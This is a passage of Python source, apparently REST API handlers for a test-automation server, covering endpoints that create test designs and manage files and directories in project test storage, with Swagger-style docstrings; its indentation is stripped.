}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
testExecution = self.request.data.get("test-execution")
if testExecution is None:
raise EmptyValue("Please specify a test execution")
testProperties = self.request.data.get("test-properties")
if testProperties is None:
raise EmptyValue("Please specify a test properties")
testName = self.request.data.get("test-name")
if testName is None:
raise EmptyValue("Please specify a test name")
testPath = self.request.data.get("test-path")
if testPath is None:
raise EmptyValue("Please specify a test path")
testExtension = self.request.data.get("test-extension")
if testExtension is None:
raise EmptyValue("Please specify a test extension")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
if testExtension not in ["tgx", "tpx"]:
raise HTTP_400("Bad test extension provided (%s)" % testExtension)
if testExtension == "tgx":
success, error_msg, all_tests = RepoTests.instance().addtf2tg(data_=testExecution)
if success != Context.instance().CODE_OK:
return {"cmd": self.request.path,
"status": False, "error": error_msg}
testData = {'test-definition': '',
'test-execution': all_tests,
'test-properties': testProperties,
'test-extension': testExtension}
if testExtension == "tpx":
success, error_msg = RepoTests.instance().addtf2tp(data_=testExecution)
if success != Context.instance().CODE_OK:
return {"cmd": self.request.path,
"status": False, "error": error_msg}
testData = {'test-definition': '',
'test-execution': testExecution,
'test-properties': testProperties,
'test-extension': testExtension}
task = TaskManager.getObjectTask(
testData=testData,
testName=testName,
testPath=testPath,
testUser=user_profile["login"],
testId=0,
testBackground=False,
context=Context
)
status, error_msg = task.parseTest()
del task
return {"cmd": self.request.path, "status": status, "error": error_msg}
class TestsCreateDesign(HandlerCORS):
"""
/rest/tests/create/design
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: create the design of a test (unit, abstract and suite)
description: ''
operationId: testsCreateDesign
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, test-definition, test-execution, test-properties, test-name, test-path, test-extension ]
properties:
project-id:
type: integer
test-definition:
type: string
test-execution:
type: string
test-properties:
type: string
test-name:
type: string
test-path:
type: string
test-extension:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
status:
type: boolean
error-msg:
type: string
examples:
application/json: |
{
"cmd": "/tests/check/design",
"status": True,
"error-msg": "...."
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
testDefinition = self.request.data.get("test-definition")
if testDefinition is None:
raise EmptyValue("Please specify a test definition")
testExecution = self.request.data.get("test-execution")
if testExecution is None:
raise EmptyValue("Please specify a test execution")
testProperties = self.request.data.get("test-properties")
if testProperties is None:
raise EmptyValue("Please specify a test properties")
testName = self.request.data.get("test-name")
if testName is None:
raise EmptyValue("Please specify a test name")
testPath = self.request.data.get("test-path")
if testPath is None:
raise EmptyValue("Please specify a test path")
testExtension = self.request.data.get("test-extension")
if testExtension is None:
raise EmptyValue("Please specify a test extension")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
if testExtension not in ["tax", "tux", "tsx"]:
raise HTTP_400("Bad test extension provided (%s)" % testExtension)
task = TaskManager.getObjectTask(
testData=self.request.data, testName=testName,
testPath=testPath, testUser=user_profile["login"],
testId=0, testBackground=False,
projectId=projectId,
# statsmgr=StatsManager.instance(),
context=Context
)
parsed = task.parseTestDesign()
del task
return {"cmd": self.request.path,
"error": parsed["error"],
"error-msg": parsed["error-details"],
"design": parsed["design"],
"xml-design": parsed["design-xml"],
}
class TestsCreateDesignTpg(HandlerCORS):
"""
/rest/tests/create/design/tpg
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: create the design of a test (plan and global)
description: ''
operationId: testsCreateDesignTpg
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, test-execution, test-properties, test-name, test-path, test-extension ]
properties:
project-id:
type: integer
test-execution:
type: array
items:
type: string
test-properties:
type: string
test-name:
type: string
test-path:
type: string
test-extension:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
status:
type: boolean
error-msg:
type: string
examples:
application/json: |
{
"cmd": "/tests/check/design/tpg",
"status": True,
"error-msg": "...."
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
testExecution = self.request.data.get("test-execution")
if testExecution is None:
raise EmptyValue("Please specify a test execution")
testProperties = self.request.data.get("test-properties")
if testProperties is None:
raise EmptyValue("Please specify a test properties")
testName = self.request.data.get("test-name")
if testName is None:
raise EmptyValue("Please specify a test name")
testPath = self.request.data.get("test-path")
if testPath is None:
raise EmptyValue("Please specify a test path")
testExtension = self.request.data.get("test-extension")
if testExtension is None:
raise EmptyValue("Please specify a test extension")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
if testExtension not in ["tgx", "tpx"]:
raise HTTP_400("Bad test extension provided (%s)" % testExtension)
if testExtension == "tgx":
success, error_msg, self.request.data["test-execution"] = RepoTests.instance().addtf2tg(
data_=self.request.data["test-execution"]
)
if success != Context.instance().CODE_OK:
return {"cmd": self.request.path,
"status": False, "error-msg": error_msg}
if testExtension == "tpx":
success, error_msg = RepoTests.instance().addtf2tp(
data_=self.request.data["test-execution"]
)
if success != Context.instance().CODE_OK:
return {"cmd": self.request.path,
"status": False, "error-msg": error_msg}
task = TaskManager.getObjectTask(
testData=self.request.data, testName=testName,
testPath=testPath, testUser=user_profile["login"],
testId=0, testBackground=False,
projectId=projectId,
# statsmgr=StatsManager.instance(),
context=Context
)
parsed = task.parseTestDesign()
del task
return {"cmd": self.request.path,
"error": parsed["error"],
"error-msg": parsed["error-details"],
"design": parsed["design"],
"xml-design": parsed["design-xml"],
}
class TestsFileDownload(HandlerCORS):
"""
/rest/tests/file/download
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: download file from the test storage
description: ''
operationId: testsFileDownload
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, file-path ]
properties:
project-id:
type: integer
file-path:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
file-content:
type: string
examples:
application/json: |
{
"cmd": "/tests/file/download",
"file-content": "...."
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
filePath = self.request.data.get("file-path")
if filePath is None:
raise EmptyValue("Please specify a file path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
success, _, _, _, _, content, _, _= RepoTests.instance().getFile(pathFile=filePath,
binaryMode=True,
project=projectId,
addLock=False)
if success != Context.instance().CODE_OK:
raise HTTP_500("Unable to download file")
return {"cmd": self.request.path, "file-content": content}
class TestsFileOpen(HandlerCORS):
"""
/rest/tests/file/open
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: open and lock file from the test storage
description: ''
operationId: testsFileOpen
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, file-path ]
properties:
project-id:
type: integer
file-path:
type: string
ignore-lock:
type: boolean
read-only:
type: boolean
custom-param:
type: integer
destination-id:
type: integer
action-id:
type: integer
extra:
type: object
responses:
'200':
schema :
properties:
cmd:
type: string
file-content:
type: string
examples:
application/json: |
{
"cmd": "/tests/file/open",
"file-content": "...."
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
filePath = self.request.data.get("file-path")
if filePath is None:
raise EmptyValue("Please specify a file path")
_ignoreLock = self.request.data.get("ignore-lock", False)
_readOnly = self.request.data.get("read-only", False)
_customParam = self.request.data.get("custom-param")
_actId = self.request.data.get("action-id")
_destId = self.request.data.get("destination-id")
# new in v19, news extras parameters used only by the qt client
# these parameters are introduced by the pull request from dbr13
# contribution user.
# update location is true when the test location in testplan/testglobal is updated
# the old test location is also provided to search it in other
# files and update it
extra_update_location = self.request.data.get(
'extra', {}).get('update_location', False)
# the old test location from testplan/testglobal
# these parameters are used when the update_location is True
extra_filename = self.request.data.get(
'extra', {}).get('file_name', '')
extra_ext = self.request.data.get('extra', {}).get('file_ext', '')
extra_projectid = self.request.data.get(
'extra', {}).get('project_id', 0)
extra_path = self.request.data.get(
'extra', {}).get('file_path', '')
# referer to the origin file (testplan or testglobal) which ask to open the file
# the path and the project id if the file is provided
# the refresh referer indicates or not if the referer file must be
# updated or not
extra_file_referer_path = self.request.data.get(
'extra', {}).get('file_referer_path', '')
extra_file_referer_projectid = self.request.data.get(
'extra', {}).get('file_referer_projectid', 0)
extra_file_referer_refresh = self.request.data.get(
'extra', {}).get('file_referer_refresh', False)
# provide a specific sub test id in a testplan or testglobal
# this parameter is used from find test usage function
extra_subtest_id = self.request.data.get(
'extra', {}).get('subtest_id', '')
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
addLock = True
if _destId is not None and _actId is not None:
addLock = False
_ignoreLock = False
_readOnly = False
resultGetFile = RepoTests.instance().getFile(pathFile=filePath,
project=projectId,
login=user_profile['login'],
forceOpen=_ignoreLock,
readOnly=_readOnly,
addLock=addLock)
success, path_file, name_file, ext_file, project, data_base64, locked, locked_by = resultGetFile
if success != Context.instance().CODE_OK:
raise HTTP_500("Unable to open test file")
rsp_rest = {"cmd": self.request.path,
"file-content": data_base64,
"file-path": path_file,
"file-name": name_file,
"file-extension": ext_file,
"locked": locked,
"locked-by": locked_by,
"project-id": project,
"custom-param": _customParam,
"action-id": _actId,
"destination-id": _destId,
"referer-refresh": extra_file_referer_refresh,
"subtest-id": str(extra_subtest_id)}
# dbr13 >>> when we set checkbox in the Update->Location
if extra_update_location:
file_path = path_file or '/'
RepoTests.instance().updateLinkedScriptPath(project=extra_projectid,
mainPath=extra_path,
oldFilename=extra_filename,
extFilename=extra_ext,
newProject=projectId,
newPath=file_path,
newFilename=name_file,
newExt=ext_file,
user_login=user_profile['login'],
file_referer_path=extra_file_referer_path,
file_referer_projectid=extra_file_referer_projectid
)
# dbr13 <<<
return rsp_rest
class TestsFileUpload(HandlerCORS):
"""
/rest/tests/file/upload
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Upload file the test storage
description: ''
operationId: testsFileUpload
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, file-path, file-name, file-extension, file-content ]
properties:
project-id:
type: integer
file-path:
type: string
file-name:
type: string
file-extension:
type: string
file-content:
type: string
overwrite:
type: boolean
close-after:
type: boolean
add-folders:
type: boolean
responses:
'200':
schema :
properties:
cmd:
type: string
code:
type: integer
examples:
application/json: |
{
"cmd": "/tests/file/upload",
"code": 200
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
filePath = self.request.data.get("file-path")
if filePath is None:
raise EmptyValue("Please specify a file path")
fileName = self.request.data.get("file-name")
if fileName is None:
raise EmptyValue("Please specify a file name")
fileExt = self.request.data.get("file-extension")
if fileExt is None:
raise EmptyValue("Please specify a file extension")
fileContent = self.request.data.get("file-content")
if fileContent is None:
raise EmptyValue("Please specify a file content")
_overwrite = self.request.data.get("overwrite", False)
_closeafter = self.request.data.get("close-after", False)
_addfolders = self.request.data.get("add-folders", False)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
putFileReturn = RepoTests.instance().uploadFile(pathFile=filePath,
nameFile=fileName,
extFile=fileExt,
contentFile=fileContent,
login=user_profile['login'],
project=projectId,
overwriteFile=_overwrite,
createFolders=_addfolders,
lockMode=True,
binaryMode=True,
closeAfter=_closeafter)
success, pathFile, nameFile, extFile, project, overwriteFile, closeAfter, isLocked, lockedBy = putFileReturn
return {"cmd": self.request.path,
"code": success,
"file-path": pathFile,
"file-name": nameFile,
"file-extension": extFile,
"project-id": project,
"overwrite": overwriteFile,
"close-after": closeAfter,
"locked": isLocked,
"locked-by": lockedBy}
class TestsFileRemove(HandlerCORS):
"""
/rest/tests/file/remove
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: remove file in the test storage
description: ''
operationId: testsFileRemove
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, file-path ]
properties:
project-id:
type: integer
file-path:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/file/remove",
"message": "file successfully removed"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
filePath = self.request.data.get("file-path")
if not filePath:
raise EmptyValue("Please specify a file path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
success = RepoTests.instance().delFile(
pathFile=filePath, project=projectId, supportSnapshot=False)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to remove file")
if success == Context.instance().CODE_FAILED:
raise HTTP_403("Remove file denied")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("File does not exists")
return {"cmd": self.request.path, "message": "file sucessfully removed",
"project-id": projectId}
class TestsFileUnlock(HandlerCORS):
"""
/rest/tests/file/unlock
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: unlock file in the test storage
description: ''
operationId: testsFileUnlock
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, file-path, file-name, file-extension ]
properties:
project-id:
type: integer
file-path:
type: string
file-name:
type: string
file-extension:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/file/unlock",
"message": "file successfully unlocked"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
filePath = self.request.data.get("file-path")
if filePath is None:
raise EmptyValue("Please specify a source file path")
fileName = self.request.data.get("file-name")
if fileName is None:
raise EmptyValue("Please specify a source file filename")
fileExt = self.request.data.get("file-extension")
if fileExt is None:
raise EmptyValue("Please specify a source file extension")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
success = RepoTests.instance().unlockFile(pathFile=filePath,
nameFile=fileName,
extFile=fileExt,
project=projectId,
login=user_profile["login"])
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to unlock test file")
return {"cmd": self.request.path, "message": "file sucessfully unlocked",
"project-id": projectId}
# dbr13 >>>
class TestsFindFileUsage(HandlerCORS):
"""
/tests/find/file-usage
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Finding script usages included in test plans and globals
description: ''
operationId: testsFindFileUsage
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, file-path ]
properties:
project-id:
type: integer
file-path:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
folder-content:
type: dict
examples:
application/json: |
{
"cmd": "/tests/find/file-usage",
"folder-content": {}
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
filePath = self.request.data.get("file-path")
if filePath is None:
raise EmptyValue("Please specify a source filepath")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# checking input
if not isinstance(projectId, int):
raise HTTP_400("Bad project id provided in request, int expected")
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
response = RepoTests.instance().getTestFileUsage(file_path=filePath,
project_id=projectId,
user_login=user_profile['login'])
return {
'cmd': self.request.path,
'response': response,
"usage-file-path": filePath,
"usage-project-id": projectId
}
class TestsFileRename(HandlerCORS):
"""
/rest/tests/file/rename
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Rename file in the test storage
description: ''
operationId: testsFileRename
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ project-id, file-name, file-path, file-extension ]
properties:
project-id:
type: integer
file-name:
type: string
file-path:
type: string
file-extension:
type: string
destination:
type: object
required: [ file-name ]
properties:
file-name:
type: string
upload_location:
required: [upload_location]
properties:
upload_location: boolean
responses:
'200':
description: rename response
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/file/rename",
"message": "file successfully renamed"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
source = self.request.data.get("source")
if source is None:
raise EmptyValue("Please specify source")
projectId = self.request.data.get("source")["project-id"]
if projectId is None:
raise EmptyValue("Please specify a project id")
filePath = self.request.data.get("source")["file-path"]
if filePath is None:
raise EmptyValue("Please specify a source filepath")
fileName = self.request.data.get("source")["file-name"]
if fileName is None:
raise EmptyValue("Please specify a source file filename")
fileExt = self.request.data.get("source")["file-extension"]
if fileExt is None:
raise EmptyValue("Please specify a source file extension")
destination = self.request.data.get("destination")
if destination is None:
raise EmptyValue("Please specify destination")
newFileName = self.request.data.get("destination")["file-name"]
if newFileName is None:
raise EmptyValue("Please specify a destination file name")
# dbr13 >>>
update_location = self.request.data.get("update_location", False)
# dbr13 <<<
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
success = RepoTests.instance().renameFile(
mainPath=filePath,
oldFilename=fileName,
newFilename=newFileName,
extFilename=fileExt,
project=projectId,
supportSnapshot=False
)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to rename file")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Rename file denied")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("File does not exists")
# dbr13 >>>
# When we set checkbox in the rename
if update_location:
RepoTests.instance().updateLinkedScriptPath(
project=projectId,
mainPath=filePath,
oldFilename=fileName,
extFilename=fileExt,
newProject=projectId,
newPath=filePath,
newFilename=newFileName,
newExt=fileExt,
user_login=user_profile['login'])
# dbr13 >>>
# I think we need add some info into return but I haven't thought about
# it yet =)
return {"cmd": self.request.path, "message": "file sucessfully renamed",
"project-id": projectId,
"file-path": filePath,
"file-name": fileName,
"file-extension": fileExt,
"new-file-name": newFileName}
class TestsFileDuplicate(HandlerCORS):
"""
/rest/tests/file/duplicate
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Duplicate file in the test storage
description: ''
operationId: testsFileDuplicate
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ project-id, file-name, file-path, file-extension ]
properties:
project-id:
type: integer
file-name:
type: string
file-path:
type: string
file-extension:
type: string
destination:
type: object
required: [ project-id, file-path, file-name ]
properties:
project-id:
type: integer
file-path:
type: string
file-name:
type: string
responses:
'200':
description: rename response
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/file/rename",
"message": "file successfully renamed"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
source = self.request.data.get("source")
if source is None:
raise EmptyValue("Please specify source")
projectId = self.request.data.get("source")["project-id"]
if projectId is None:
raise EmptyValue("Please specify a source projcet-id")
fileName = self.request.data.get("source")["file-name"]
if fileName is None:
raise EmptyValue("Please specify a source filename")
filePath = self.request.data.get("source")["file-path"]
if filePath is None:
raise EmptyValue("Please specify a source file path")
fileExt = self.request.data.get("source")["file-extension"]
if fileExt is None:
raise EmptyValue("Please specify a source file extension")
destination = self.request.data.get("destination")
if destination is None:
raise EmptyValue("Please specify destination")
newProjectId = self.request.data.get("destination")["project-id"]
if newProjectId is None:
raise EmptyValue("Please specify a project id")
newFileName = self.request.data.get("destination")["file-name"]
if newFileName is None:
raise EmptyValue("Please specify a destination file name")
newFilePath = self.request.data.get("destination")["file-path"]
if newFilePath is None:
raise EmptyValue("Please specify a destination file path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
_check_project_permissions(
user_login=user_profile['login'],
project_id=newProjectId)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
newFilePath = os.path.normpath("/" + newFilePath)
success = RepoTests.instance().duplicateFile(
mainPath=filePath,
oldFilename=fileName,
newFilename=newFileName,
extFilename=fileExt,
project=projectId,
newProject=newProjectId,
newMainPath=newFilePath
)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to duplicate file")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Duplicate file denied")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("File does not exists")
return {"cmd": self.request.path, "message": "file sucessfully duplicated",
"project-id": projectId}
class TestsFileMove(HandlerCORS):
"""
/rest/tests/file/move
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Move file in the test storage
description: ''
operationId: testsFileMove
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ project-id, file-name, file-path, file-extension ]
properties:
project-id:
type: integer
file-name:
type: string
file-path:
type: string
file-extension:
type: string
destination:
type: object
required: [ project-id, file-path ]
properties:
project-id:
type: integer
file-path:
type: string
upload_location:
required: [upload_location]
properties:
upload_location: boolean
responses:
'200':
description: move response
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/file/move",
"message": "file successfully moved"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
source = self.request.data.get("source")
if source is None:
raise EmptyValue("Please specify source")
projectId = self.request.data.get("source")["project-id"]
if projectId is None:
raise EmptyValue(
"Please specify a project name or a project id")
filePath = self.request.data.get("source")["file-path"]
if filePath is None:
raise EmptyValue("Please specify a source filename")
fileName = self.request.data.get("source")["file-name"]
if fileName is None:
raise EmptyValue("Please specify a source file path")
fileExt = self.request.data.get("source")["file-extension"]
if fileExt is None:
raise EmptyValue("Please specify a source file extension")
destination = self.request.data.get("destination")
if destination is None:
raise EmptyValue("Please specify destination")
newProjectId = self.request.data.get("destination")["project-id"]
if newProjectId is None:
raise EmptyValue("Please specify a new project id")
newFilePath = self.request.data.get("destination")["file-path"]
if newFilePath is None:
raise EmptyValue("Please specify a destination file path")
update_location = self.request.data.get("update_location", False)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
_check_project_permissions(
user_login=user_profile['login'],
project_id=newProjectId)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
newFilePath = os.path.normpath("/" + newFilePath)
success = RepoTests.instance().moveFile(
mainPath=filePath,
fileName=fileName,
extFilename=fileExt,
newPath=newFilePath,
project=projectId,
newProject=newProjectId,
supportSnapshot=True
)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to move file")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Move file denied")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("File does not exists")
if update_location:
RepoTests.instance().updateLinkedScriptPath(project=projectId,
mainPath=filePath,
oldFilename=fileName,
extFilename=fileExt,
newProject=newProjectId,
newPath=newFilePath,
newFilename=fileName,
newExt=fileExt,
user_login=user_profile['login'],
)
return {"cmd": self.request.path, "message": "file successfully moved",
"project-id": projectId}
class TestsDirectoryAdd(HandlerCORS):
"""
/rest/tests/directory/add
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Add directory in the test storage
description: ''
operationId: testsDirectoryAdd
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, directory-name, directory-path ]
properties:
project-id:
type: integer
directory-name:
type: string
directory-path:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/directory/add",
"message": "directory successfully added"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
folderName = self.request.data.get("directory-name")
if folderName is None:
raise EmptyValue("Please specify a source folder name")
folderPath = self.request.data.get("directory-path")
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
success = RepoTests.instance().addDir(
pathFolder=folderPath,
folderName=folderName,
project=projectId)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to add directory")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Directory already exists")
return {"cmd": self.request.path, "message": "directory successfully added",
"project-id": projectId}
class TestsDirectoryRename(HandlerCORS):
"""
/rest/tests/directory/rename
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Rename directory in the test storage
description: ''
operationId: testsDirectoryRename
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ project-id, directory-name, directory-path ]
properties:
project-id:
type: integer
directory-name:
type: string
directory-path:
type: string
destination:
type: object
required: [ project-id, directory-name ]
properties:
project-id:
type: integer
directory-name:
type: string
responses:
'200':
description: rename response
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/directory/rename",
"message": "directory successfully renamed"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
source = self.request.data.get("source")
if source is None:
raise EmptyValue("Please specify source")
projectId = self.request.data.get("source")["project-id"]
if projectId is None:
raise EmptyValue("Please specify a project id")
folderName = self.request.data.get("source")["directory-name"]
if folderName is None:
